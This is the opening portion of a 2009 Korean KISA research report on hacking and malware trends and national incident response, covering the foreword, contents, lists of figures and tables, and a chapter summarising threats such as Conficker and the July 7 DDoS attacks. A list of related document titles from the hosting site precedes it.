최종연구보고서 KISA-RP 정보시스템 해킹 바이러스현황및대응

Similar documents
< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B


<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

*

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

*2008년1월호진짜

TGDPX white paper

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2

*****

untitled

유포지탐지동향

<C0CCC8ADC1F82E687770>

암호내지

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>

#WI DNS DDoS 공격악성코드분석

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉

2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

<4D F736F F F696E74202D D203120C3D6B1D920C1A4BAB8BAB8C8A320C0A7C7F9B0FA20C4A7C7D8BBE7B0ED20B5BFC7E220B1E8C8ABBCAE202E707

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

<31305FBEC6C0CCC5DB2E687770>

Secure Programming Lecture1 : Introduction

Windows 8에서 BioStar 1 설치하기

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

5th-KOR-SANGFOR NGAF(CC)

게시판 스팸 실시간 차단 시스템

F O C U S 3 홈페이지를통한악성코드유포및대응방안 FOCUS 고민석 *, 김홍석 **, 이용준 ***, 박정환 **** 최근홈페이지, 웹하드등을해킹하여악성코드를은닉시킴으로써, 접속하는이용자PC를악성코드에감염시키는피해가증가하고있다. 홈페이지, 웹하드는이용자접속이많아

< FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

Microsoft Word - src.doc

<32BDBAB8B6C6AEC6F9B1DDC0B6B0C5B7A13130B0E8B8EDBEC8B3BBBCAD2E687770>

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 13 - 경유지

SBR-100S User Manual

< F5320B4EBC0C0C0E5BAF1BFA120B4EBC7D120BAB8BEC8B1E2B4C920B0A1C0CCB5E528C3D6C1BE292E687770>

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

ActFax 4.31 Local Privilege Escalation Exploit

untitled

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

Windows 10 General Announcement v1.0-KO

AhnLab_template

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

#HNS-WI 금융권및포털사이트이용자대상악성코드및공격기법분석 (v0.1 공개버전 )

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷

08_spam.hwp

슬라이드 1

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

국가정보보호백서 제1장 정보환경 변화와 정보보호 정보통신기술은 우리에게 보다 나은 미래를 제공해주는 원동력이자 현대사회에서 없어서는 안 될 필수불가결한 사회기반으로 여겨지고 있다. 또한 정보통신기술은 경제 성장의 원천이 되고 있으 며 사회 시스템의 효율성을

<4D F736F F F696E74202D20C0FCBCBAC7D0202D20B1E2BEF720C1A4BAB820BAB8C8A3B8A620C0A7C7D120BEC7BCBAC4DAB5E520B4EBC0C0205BC8A3C8AF20B8F0B5E55D>

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

PowerPoint 프레젠테이션

Microsoft PowerPoint - 원유재.ppt

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

untitled

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

IPv6 보안취약점동향 인터넷주소산업팀 정유경선임연구원, 김웅상책임연구원, 임준형팀장 2014년 9월, 국내 IPv6 상용서비스의개시와함께 IPv6 도입및전환이시작되었다. 국내외적으로 IPv6로의전환에따른관련통계자료들이증가추세를보이며실제환경속으로 IPv6주소가들어오고있

Vol.06 June CONTENTS 2 page 1. 월간동향요약 월보안이슈 주요보안권고 침해사고통계분석요약 침해사고위협분석요약 4 5 page 2. 침해사고통계분석 2-1. 악성코드피해신고통계분석 5

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론

[Brochure] KOR_TunA

I. 서론 FOCUS 한국인터넷진흥원(KISA) 인터넷침해대응센터(KrCERT)는 다양한 방법으로 해킹사고를 탐지하고 있다. 인터넷침해대응센터 자체적으로 보유하고 있는 탐지체계 뿐만 아니라 시스템 담당자들이 직접 신고하는 신고체계 또한 해킹사고 탐지에 있어 중요한 역할

Cloud Friendly System Architecture

wtu05_ÃÖÁ¾

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

Microsoft PowerPoint - 권장 사양

슬라이드 1

PowerPoint 프레젠테이션

PowerPoint Template

슬라이드 1

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 fo

Microsoft PowerPoint - chap01-C언어개요.pptx


2015 년 SW 개발보안교육과정안내

Contents 월간동향요약 2. 침해사고통계분석 3 -. 증감추이 ( 전월대비 ) 3-2. 침해사고통계요약 3-3. 침해사고통계현황 4 웜 바이러스신고건수추이 주요웜 바이러스별현황 -4. 해킹 6 해킹사고접수처리건수추이 피해기관별분류 피해운영체제별분류 피싱경유지신고처

2006_8_14 (8_17 updated) ms ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp

1-1 5 월보안이슈 국내금융기관 ( 은행 ) 웹사이트의파밍 (Pharming) 사례가발생하여이용자들의주의가요구됨 - PC 의 hosts 파일이변조되어정상적인은행홈페이지주소를입력해도해커가만든피싱사이트로접속되고, 보안승급신청화면을가장해주민등록번호, 이체비밀번호, 보안카드

호스팅사업자보안안내서 ( 해킹경유지악용방지 ) 침해사고분석단사고분석팀

AhnLab_template

MOVE TO THE LEFT OF THE KILL CHAIN AND STOP THE BAD GUYS MOVE TO THE RIGHT

본보고서내용의전부나일부를인용하는경우에는반드시출처 [ 자료 : 한국인터넷진흥원인터넷침해대응센터 ] 를명시하여주시기바랍니다.

ㅇ악성코드 분석

PowerPoint 프레젠테이션

<C3E6B3B2B1B3C0B C8A32DC5BEC0E7BFEB28C0DBB0D4292D332E706466>

목차 Part Ⅰ 3 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...


목록 1. DoS/DDoS attack? 2. Dos와 DDoS의차이점 3. DoS공격으로의심할수있는증상 4. DoS 공격유형 5. DDoS 공격유형 6. 주요 DDoS 공격피해사례 7. DoS와 DDoS 공격에대한대응책 8. 알게된사실 9. 참고사이트


Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

2

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

Cisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

ePapyrus PDF Document

..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * A

Transcription:

최종연구보고서 KISA-RP-2009-0014 2009 정보시스템 해킹 바이러스현황및대응 2009. 12.

발간사 한국, 일본, 중국등에서음력 7월7일은은하수양쪽둑에있는견우성과직녀 성이 1 년에한번만난다는전설에따라별을제사지내는칠석날입니다. 하지만 2009년 7월 7 일은청와대를비롯한정부기관, 금융기관, 포탈사이트등사회적 파급효과가큰사이트들에 DDoS 침해사고가발생하여보안전문가들만의전문용어 였던 DDoS 란단어를전국민에게각인시켜준날이기도합니다. 칠석날이성스 러운날로기억되는것만큼 2009년 7월 7일은온국민에게정보보호의중요성을 일깨워준날로조명될것입니다. 현대인에게컴퓨터및인터넷기술은일상생활에서다양한용도로활용되면서 지속적으로발전해나가고있습니다. 특정인에의해집중생산되었던정보도 Web2.0 시대를거치며누구나정보소비자뿐아니라생산자의역할을할수있게 되었으며, 유비쿼터스 스마트컴퓨팅등으로진화하며인간대인간중심의통신 에서인간과사물, 사물과사물간의소통으로통신패러다임이변화되고있습니다. 이 러한제반기술및서비스의급격한진화는시장의요구에의해기능성, 편의성중 심으로만발전되어설계초기에고려하지못한다양한역기능또한필연적으로수반 하고있으며보호대상및서비스역시기하급수적으로확대되어가고있습니다. 한국인터넷진흥원은그간인터넷침해대응센터를 24시간운영하여신종위협및 웜바이러스, 취약점등으로부터국내인터넷망보호를위해노력해왔습니다. 또한침해사고발생에따른신속한대응조치, 침해사고확산방지와피해규모 최소화에기여해왔으며, 대국민을대상으로한침해사고예방활동을꾸준히 진행하고있습니다. 2009 정보시스템해킹 바이러스현황및대응 보고서는 2009년국내에서 발생된침해사고통계, 주요예방 대응활동, 국내 외주요침해사고대응협력 체계구축및역량강화, 향후전망에대한내용으로구성되어있습니다. 이러한 정보는기업의정보시스템실무담당자및일반사용자가국가적인측면에서수행하는 침해사고대응체계에대한이해를높이고, 각주체별공동대응에필요한상호역할 인식및공감대형성을위한오작교로서의역할을할것으로기대합니다.

한국인터넷진흥원인터넷침해대응센터는역량을더욱증대시키고국내 외 유관 기관과협력체계를강화하여안전한인터넷세상을만들어우리대한민국이진정한 IT 강국으로도약하는데튼튼한초석이되기위하여노력할것입니다. 여러분의많은 협력과조언을부탁드립니다. 2009년 12월한국인터넷진흥원원장김희정

제출문 방송통신위원회위원장귀하 본보고서를 2009 정보시스템해킹바이러스현황및대응연구의 최종연구결과보고서로제출합니다. 2009년 12월 연구책임자 : 인터넷침해대응센터본부장직무대행이명수 참여연구원 : 전략기획팀팀장류찬호 이용자보호팀팀장신화수 코드분석팀팀장이석래 해킹대응팀팀장최중섭 상황관제팀팀장신대규 그외인터넷침해대응센터연구원전원이참여함

목 차 제 1 장개요 1 제 1 절 2009 년해킹바이러스 동향요약 1 제 2 절보고서의구성 5 제 2 장 2009 년침해사고동향및전망 7 제 제 1 절국내민간부문해킹바이러스 통계및분석 7 2 절악성코드동향및전망 17 제 3 절악성 Bot 동향및전망 29 제 4 절홈페이지해킹동향및전망 36 제 5 절 DDoS 공격동향및전망 44 제 6 절보안취약점현황 49 제 3 장침해사고예방및대응활동 62 제 제 제 제 제 1 절악성코드은닉사이트탐지및대응 62 2 절악성봇대응및분석 66 3 절주요악성코드분석및대응 73 4 절주요취약점분석및대응 88 5 절웹취약점원격점검서비스 100 제 6 절 PC 원격점검서비스 112 제 제 7 절휘슬/ 캐슬보급및결과 116 8 절웹사이트보안수준확인시스템 119 제 9 절 7.7 DDoS 침해사고대응 127 - i -

제 4 장국내 외침해사고대응협력체계구축 135 제 제 제 제 제 1 절국내침해사고대응협력강화 135 2 절민관 합동조사단전문가풀운영 141 3 절국제침해사고대응협력활동 148 4 절아 태정보보호교육 154 5 절사이버가상시나리오공모전 161 제 5 장침해사고대응역량강화 163 제 제 제 제 1 절국내모바일침해사고공동대응훈련실시 163 2 절대학정보보호동아리지원및정보보호경진대회 171 3 절해킹방어대회개최 180 4 절침해사고예방교육및세미나 182 제 6 장결론 188 참고사이트 190 부록 192 부록 부록 부록 부록 A. 운영체제별보안권고문및패치배포사이트목록 194 B. 2009 년보안공지문현황 196 C. 경보체계 199 D. 해킹 바이러스대응기관연락처 206 부록 E. 2009년 MS 윈도우취약점및보안업데이트현황 207 - ii -

그림목차 ( 그림 2-1) 월별침해사고전체통계그래프 9 ( 그림 2-2) 월별국내웜 바이러스신고건수 10 ( 그림 2-3) 해킹사고접수처리건수유형별분류 13 ( 그림 2-4) 해킹사고피해기관별분류 14 ( 그림 2-5) 해킹사고피해운영체제별분류 15 ( 그림 2-6) 월별국내악성봇(Bot) 감염률 6 1 ( 그림 2-7) 홈페이지은닉사고처리건수추이 18 ( 그림 2-8) 홈페이지은닉악성코드동향 19 ( 그림 2-9) 풍운도구의사용자인터페이스 2 ( 그림 2-10) 풍운과 Netbot 의공격유형선택 2 ( 그림 2-11) MS 비디오스트리밍 ActiveX 취약점악용사례 5 2 ( 그림 2-12) 보호나라에서제공하는 Conficker 확인서비스 0 3 ( 그림 2-13) Torpig 봇넷의네트워크구조 2 3 ( 그림 2-14) 홈페이지변조건수 38 ( 그림 2-15) 악성코드은닉사고건수 39 ( 그림 2-16) DDoS 사이버긴급대피소흐름도 8 4 ( 그림 2-17) 취약점증가추이 49 ( 그림 2-18) 공격근원지추이 50 ( 그림 2-19) 취약점공격영향력추이 51 ( 그림 2-20) 취약점공격대상변화추이 52 ( 그림 2-21) 전자문서포맷관련취약점변화추이 52 ( 그림 2-22) 전자문서및멀티미디어관련취약점비율 53 ( 그림 2-23) 웹브라우저관련취약점추이 54 ( 그림 2-24) MS 위험등급별취약점월별통계 6 5 ( 그림 2-25) MS 보안업데이트대상제품군분포 7 5 ( 그림 2-26) MS 취약점영향력별분포 8 5 - iii -

( 그림 2-27) 위험등급별 Un-Patch 기간 9 5 ( 그림 3-1) 악성코드은닉을통한악성코드감염구성도 62 ( 그림 3-2) DNS 싱크홀흐름도 6 ( 그림 3-3) 싱크홀통합관리시스템 68 ( 그림 3-4) 악성봇감염확인시스템 70 ( 그림 3-5) 엔씨소프트악성봇감염확인 71 ( 그림 3-6) PC 자동보안업데이트 S/W 72 ( 그림 3-7) 7.7 DDoS 악성코드공격개요도 4 7 ( 그림 3-8) uregvs.nls 파일구조 4 7 ( 그림 3-9) 7월 10일 00 시이후하드디스크손상코드실행 5 7 ( 그림 3-10) Conficker 트래픽변화추이 7 7 ( 그림 3-11) 신종플루관련스팸메일의예 81 ( 그림 3-12) Zbot 의온라인뱅킹사이트목록수신및디코딩의예 2 8 ( 그림 3-13) 특정그룹을대상으로하는공격의예 83 ( 그림 3-14) Zlob 전파방식의예 4 8 ( 그림 3-15) DDoS 공격모드설정화면 5 8 ( 그림 3-16) 취약점을이용한악성코드다운로드흐름 90 ( 그림 3-17) Data 속성에입력되는 logo.gif 파일 2 9 ( 그림 3-18) 변경된예외처리함수저장공간 92 ( 그림 3-19) Adobe Acrobat Reader PDF 에삽입된악성코드 4 9 ( 그림 3-20) 악성코드유포사이트접속 94 ( 그림 3-21) 추가악성코드다운로드 94 ( 그림 3-22) Acrobat JavaScript 사용기능비활성화 5 9 ( 그림 3-23) 선정된 1,000개사이트중 ActiveX 존재비율 7 9 ( 그림 3-24) 분야별취약사이트분포 98 ( 그림 3-25) 일일방문자수기준상위 8 개취약사이트 9 ( 그림 3-26) 웹취약점점검서비스절차개요 10 ( 그림 3-27) 웹취약점원격점검서비스홈페이지 101 ( 그림 3-28) 웹취약점점검서비스세부절차 102 -iv-

( 그림 3-29) 취약점점검결과보고서예시 102 ( 그림 3-30) 웹취약점점검요청사업자분류 104 ( 그림 3-31) 최다발견상위 10 개웹취약점 105 ( 그림 3-32) 2008년웹취약점상위 6 가지취약점비율 106 ( 그림 3-33) 취약점중대성비율 106 ( 그림 3-34) 웹취약점유형별비율 108 ( 그림 3-35) 조치대상구분별비율 109 ( 그림 3-36) 웹보안강화통합서비스사이트 1 ( 그림 3-37) PC 원격점검서비스개요 12 ( 그림 3-38) 보호나라홈페이지의 PC 원격점검서비스안내 13 ( 그림 3-39) PC 원격점검서비스신청페이지 13 ( 그림 3-40) PC 원격점검서비스절차 14 ( 그림 3-41) 휘슬기능및서비스개요도 17 ( 그림 3-42) 웹체크서비스개요도 19 ( 그림 3-43) 웹체크화면안내 120 ( 그림 3-44) 웹체크사이트정보상세보기화면 12 ( 그림 3-45) 웹체크악성코드은닉사이트방문시차단및알림화면 123 ( 그림 3-46) 웹체크피싱사이트방문시차단및알림화면 124 ( 그림 3-47) 웹체크보안공지사항제공화면 125 ( 그림 3-48) 쇼핑몰사이트접속시화면 126 ( 그림 3-49) 쇼핑몰세부정보확인화면 126 ( 그림 3-50) 7.7 DDoS 공격개요 128 ( 그림 3-51) 7.7 DDoS 침해사고대응내역 130 ( 그림 3-52) 시간대별피해신고접수상황 13 ( 그림 4-1) TRANSITS 교육과정일정 158 ( 그림 4-2) 참석자기념촬영(5/11) 159 ( 그림 5-1) iphone Navigator 165 ( 그림 5-2) 아이폰악성코드전파로인한피해시나리오 16 ( 그림 5-3) CERT 구축및운영교육 185 ( 그림 5-4) 제13 회해킹방지워크샵 187 - v -

표목차 [ 표 2-1] 월간침해사고전체통계 9 [ 표 2-2] 월별국내웜바이러스 신고건수 10 [ 표 2-3] 월별주요웜바이러스 명칭별신고건수 11 [ 표 2-4] 해킹사고처리현황 2 1 [ 표 2-5] 해킹사고피해기관별분류 4 1 [ 표 2-6] 월별해킹사고피해운영체제별분류 5 1 [ 표 2-7] 월별국내악성봇(Bot) 감염률 6 1 [ 표 2-8] Conficker 악성코드변종이력 3 2 [ 표 2-9] 감염증상및보호기능 4 2 [ 표 2-10] 악성봇전체감염대비국내비율 0 3 [ 표 2-11] 2009 년홈페이지변조사고현황 8 3 [ 표 2-12] 2009 년홈페이지악성코드은닉사고현황 0 4 [ 표 2-13] 최근 3년간 MS 제품의취약점패치현황 5 5 [ 표 2-14] MS 위험등급분류 6 5 [ 표 2-15] 2009년 MS 주요취약점목록 9 5 [ 표 3-1] 2009 년도악성코드점검대상 3 6 [ 표 3-2] 기관별악성코드은닉점검대상 3 6 [ 표 3-3] 2009 년도악성코드중계/ 유포사이트탐지건수 4 6 [ 표 3-4] 2009 년도악성코드중계/ 유포사이트기관별분류 4 6 [ 표 3-5] 7.7 DDoS 사건개요 3 7 [ 표 3-6] Conficker 변종이력 6 7 [ 표 3-7] 풍운의공격유형 6 8 [ 표 3-8] Conficker의 autorun.inf 파일 6 8 [ 표 3-9] Autorun 비활성화를위한레지스트리키 7 8 [ 표 3-10] ActiveX 취약점이용코드 1 9 [ 표 3-11] 웹취약점점검서비스제공누계 103 -vi-

[ 표 3-12] 웹취약점유형별통계 107 [ 표 3-13] 조치구분별통계 108 [ 표 3-14] PC 원격점검연간실적 14 [ 표 3-15] 국내피해사이트현황 131 [ 표 3-16] DDoS 공격대상사이트현황 132 [ 표 3-17] PC 손상악성코드대응현황 13 [ 표 4-1] 민관합동조사단 전문가풀현황 142 [ 표 4-2] 인터넷침해사고실무분과구성 14 [ 표 4-3] 최종평가결과 162 [ 표 5-1] 대학정보보호동아리지원사업참여동아리현황 171 [ 표 5-2] KUCIS 회원대상실습교육 176 [ 표 5-3] KUCIS 정보보호세미나추진실적 17 [ 표 5-4] 2008 년해킹방어대회접수현황 180 [ 표 5-5] 본선대회순위 181 [ 표 5-6] 상반기해킹동향및대응기술세미나교육내용 182 [ 표 5-7] 하반기해킹동향및대응기술세미나교육내용 183 - vii -

제 1 장개요 제 1 절 2009 년해킹바이러스 동향요약 2009 년에도다양한유형의악성코드가출현하였으며, 이런악성코드에 감염된좀비PC 를악용한침해사고즉, 개인정보유출, 스팸메일, 시스템파괴 및금전적이득을목적으로하는 DDoS(Distributed Denial of Service, 분산서비스거부) 공격등이개인과기업에지속적으로피해를주었다. 특히 7월 7일에는지능화된 DDoS 공격으로인해커다란사회적혼란을유발 시킨바있다. 악성코드의대량생산이가능하도록자동화된공격도구를 이용하는사례역시지속적으로발생하였으며해당악성코드의공격 성공률과생존력을향상시키기위한고도의역공학 분석방해기술이 접목된사례가다수확인되었다. 지난 2008년의최대이슈가개인정보의대량유출이라면 2009년은 7.7 DDoS 침해사고로뽑는데주저하는이는거의없으리라본다. 이외에 응용프로그램취약점을노리는홈페이지은닉악성코드의지속적인위협, 금전적이익을취득할목적의침해사고증가, 사회적인이슈를악용한 악성코드의유포, 분석지연을위한고도의분석방해기술의접목, 악성코드 대량생산을위한자동화된도구의이용등이 위협동향이라고할수있다. 2009년도의주요사이버침해 웜바이러스의 경우지난해와마찬가지로특정온라인게임의계정정보 탈취를목적으로하는개인정보탈취형악성코드의신고건수가가장높은 비율을차지하였으며, 자체전파력은없으나주로웹사이트등을통해감염 되어추가적인악성코드를다운로드하는다운로더형악성코드가그뒤를 이었다. 이러한악성코드의전파경로는다양한방식으로진화하여과거스캔 -1-

이나단순이메일링크클릭등의방법이아닌소셜네트워크서비스 (SNS) 를통한전파, 그리고피싱사이트및합법적인기관을가장한접속 유도등으로고도화되고있는실정이다. 이렇게전파된악성코드가시스 템을감염시키기위해사용하는취약점은기존운영체제취약점에서로컬시 스템에설치된 Office, Adobe Acrobat Reader와같은사용자가다수인 소프트웨어취약점을악용하는사례가증가하고있어사용자개인의 보안의식이무엇보다중요해진시점이라하겠다. 악성봇은해커가원격조정을통해스팸메일발송, 추가적인악성코드다운 로드, DDoS 공격등다양한악성행위가가능하며, 국내에서발견되는 악성봇명령/ 제어서버와감염 PC의수는여전히상당수에이르고있다. 특히 2008년 11월이후급증한 Conficker 웜은국내에서도상당히많은 PC 들이감염된것으로확인되었다. 이에따라보호나라홈페이지 (www.boho.or.kr) 를통하여기존의악성봇감염확인서비스에 Conficker 감염확인서비스 를개시하고, 국내인터넷사용자가많이사용하는포털과 메신저, 그리고게임업체와의 MOU를통하여악성봇확인서비스를확대 함으로국내악성봇치료를유도하였다. 2009년대응센터에서운영하는허니넷분석결과 MS Windows 취약점인 MS08-067의영향으로 TCP/445 트래픽의유입이크게증가하였었다. 하지만, 이미국내의많은 ISP에서 TCP/445 트래픽을차단중이어서, 국외 IP로부터의트래픽유입만이크게증가하였고, 이로인하여악성봇 감염률이떨어지는효과가나타났다. 하지만국내의악성봇들도계속적 으로증가하는추세를보이고있으며,DDNS,FastFlux,DomainFlux등 악성봇에대한탐지및우회를위한기법들이계속적으로진화하고있어 이를극복할수있는기술연구에더욱관심을가질필요가있다. 2009 년주요홈페이지해킹사고는자동화된공격을이용한악성코드 대량삽입사고, 악성코드감염을이용한웹사이트관리자의계정도용 사고등이많이발생하였다. 이제홈페이지해킹은최종목적이아닌악성 -2-

코드삽입, 기업의기밀정보, 개인정보탈취등을위한경유지형태로 정착이되었다. 또한포인트적립을미끼로설치되는애드웨어들은포털 사이트의배너광고교체, 광고추가등새로운형태의공격들이등장하고 있어금전적인이익이라는궁극적인목적을달성하기위해갈수록공격 기술은더욱정교하고집요해지고있다. 국외의해커들은이미한국인의개인정보가현금화하기쉬우며한국 인터넷환경상매우유용한정보임을인식하고있다. 그러므로개인정보가 대량으로수집되는사이트들, 즉헤드헌팅, 구인 구직, SNS 사이트, 결혼 중개업소등이우선공격대상이되리라생각한다. 2009년에는 7.7 DDoS 침해사고로인해 DDoS 공격이모든국민들의 관심사가되었다. 기존에도 DDoS 공격은빈번히발생하고있었으나, 중소 규모의사이트에주로발생하였는데,7.7DDoS의경우공격대상사이트가 청와대, 국방부등정부기관과농협, 신한은행등금융권, 주요포탈등으로 접속장애발생시사회적파급효과가큰사이트들이었다. 금번 7.7 DDoS 공격은지능적이며치밀하게계획된공격방법으로서버에는처리지연 혹은불능을초래하였으며, 치료되지않은일부좀비 PC에는주요문서와 부팅기능을손상시켰다. 또한, 지금까지금품요구를목적으로발생한것과는 다르게사회적공공재를겨냥한테러의성격을띠고있었으며, 자체를널리알리려는목적의공격이었다. 공격 최근 DDoS 공격은금전적이득을목적으로보다지능적이며조직적인 공격양상을보이며, DDoS 공격의대부분을수행하는좀비 PC를만들기 위한악성봇도지속적으로고도화되고있다. 일단감염된악성봇은시스템 깊숙이잠복하여백신으로도탐지가어려울수있으며그행위에있어서도 일반프로세스와의차이점을보이지않으므로더욱식별하기가어려워지고 있다. 이렇게진화하는해킹을막기위해서는기술적대응을위한연구 및대응방안마련뿐만아니라적절한규제마련및보안인식이부족한 PC 사용자에대한적절한홍보및교육도놓치면안될것이다. -3-

인터넷침해대응센터( 이하대응센터) 는침해사고발생시범국가적인대국민 피해예방, 신속한초동대응및피해확산방지등을위해 09년한해 동안도여러대응책을지속유지발전시켜 왔다. 악성봇에대한 DNS 싱크홀 시스템적용대상및악성코드은닉사이트점검대상사이트확대, PC 원격 점검, 웹보안수준향상을위한캐슬/ 휘슬보급, 웹사이트보안수준확인 시스템고도화, 침해사고모의훈련, 국가침해사고대응전문기관협의회활동 등을수행하여왔다. 또한, 인터넷망연동구간(IX) 에서발생하는 DDoS 공격 탐지및차단을통한국내인터넷망의안정성제고를위해국내주요 인터넷망일부연동구간(IX) 에 DDoS 대응시스템을시범구축하였으며 08 년, 09년구축확대및탐지된정보를바탕으로DDoS 공격조종지를 파악 차단하는등 DDoS 공격에보다신속하고효과적으로대응할 예정이다. 이제 IT 정보통신산업은방송통신, 유무선, 음성데이터 통합인프라를 기반으로전산업과융합하여다양한신규서비스를쏟아낼것이고이에 따른역기능또한더욱지능화, 범죄화되어갈것이다. 대응센터에서는 지속적으로고도화 복잡화되는 IT환경에서선제적이고효과적인침해사고 예방및대응체계의기틀을마련하기위해지속적으로노력할것이다. 이와함께일반사용자및기업의보안인식제고, 최신보안업데이트설치, 백신프로그램사용등기본적인정보보호에대한준수노력이뒷받침 되어야한다. -4-

제 2 절보고서의구성 본 2009 정보시스템해킹바이러스 현황및대응 보고서는 2009년 발생한주요해킹 바이러스동향, 최신해킹기법및보안 이슈에대한 대응절차및대응결과를제공하고있으며, 침해사고확산방지를위한한국 인터넷진흥원 ( 이하진흥원) 대응센터활동에대하여소개하고있다. 본보고서를 바탕으로향후발생할수있는침해사고에대하여신속한대응및피해 확산방지에기여하고자한다. 본보고서의구성은다음과같다. 먼저 제2 장침해사고동향및전망 은 2009 년국내외 침해사고주요이슈와 함께대응센터에접수된해킹사고와허니넷, 지역센서공격정보및국내바이 러스백신업체의피해집계등을종합적으로분석하였으며,2009년발생한 웜바이러스, 악성봇, 홈페이지해킹, DDoS 및보안취약점에대한동향 및향후전망에대하여기술하였다. 제3 장침해사고예방및대응활동 에서는악성코드은닉사이트탐지및 대응, 해킹분야별상세분석및대응, 웹취약점점검서비스, PC 원격점검 서비스, 휘슬 캐슬보급및 웹사이트보안수준확인시스템, 7.7 DDoS 침해사고대응사례를통해침해사고를사전에예방하고신속하게탐지 및대응하기위한대응센터의활동에대하여기술하고있다. 제4 장국내외 침해사고대응협력체계구축 은주요보안이슈정보 공유를위한 ISP 워크숍개최및민 관합동조사단전문가풀운영을통한 